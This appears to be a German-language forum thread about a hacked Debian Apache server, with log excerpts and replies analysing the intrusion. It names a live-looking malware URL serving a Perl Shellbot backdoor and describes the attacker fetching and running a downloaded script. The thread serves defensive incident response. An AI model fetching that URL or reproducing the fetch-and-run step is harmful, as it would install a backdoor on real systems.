[Tue Sep 18 06:27:54 2007] [notice] Apache/2.0.54 (Debian GNU/Linux) PHP/5.1.4-Debian-0.1~sarge1 mod_ssl/2.0.54 OpenSSL/0.9.7e configured -- resumin
[Tue Sep 18 06:58:31 2007] [notice] caught SIGTERM, shutting down
[Tue Sep 18 07:04:02 2007] [notice] suEXEC mechanism enabled (wrapper: /usr/lib/apache2/suexec2)
[Tue Sep 18 07:05:42 2007] [notice] Apache/2.0.54 (Debian GNU/Linux) PHP/5.1.4-Debian-0.1~sarge1 mod_ssl/2.0.54 OpenSSL/0.9.7e configured -- resumin
[Tue Sep 18 07:32:46 2007] [notice] caught SIGTERM, shutting down
[Tue Sep 18 07:38:19 2007] [notice] suEXEC mechanism enabled (wrapper: /usr/lib/apache2/suexec2)
[Tue Sep 18 07:39:58 2007] [notice] Apache/2.0.54 (Debian GNU/Linux) PHP/5.1.4-Debian-0.1~sarge1 mod_ssl/2.0.54 OpenSSL/0.9.7e configured -- resumin
[Tue Sep 18 11:06:29 2007] [notice] caught SIGTERM, shutting down
[Tue Sep 18 11:12:02 2007] [notice] suEXEC mechanism enabled (wrapper: /usr/lib/apache2/suexec2)
[Tue Sep 18 11:13:42 2007] [notice] Apache/2.0.54 (Debian GNU/Linux) PHP/5.1.4-Debian-0.1~sarge1 mod_ssl/2.0.54 OpenSSL/0.9.7e configured -- resumin


alle anderen logs sind unbrauchbar. So wie ich vermute "holt" sich der Angreifer die b.txt und installiert diese. Wenn diese gestartet wurde holt sich das Script dann die Kontrolle.
 
Last edited by a moderator:
Gibts die "b.txt" noch? Schau doch mal welchem Benutzer sie gehört, vielleicht kommst Du dann schon etwas näher hin woher die Datei kam, also über welche Lücke.

Hab einfach mal auf´m Testrechner was versucht:

Code: 
Kaspersky Anti-Virus for Microsoft ISA Server
The requested URL "http://www.pfaubert.com/sendmail" is infected with Backdoor.Perl.Shellbot.a virus

lg Basti
 
Last edited by a moderator:
Hallo!
Letzten Endes wird wohl hXXp://www.pfaubert.com/sendmail gestartet.

Edit: Zu spät :)

mfG
Thorsten
 
You must log in or register to reply here.
Back
Top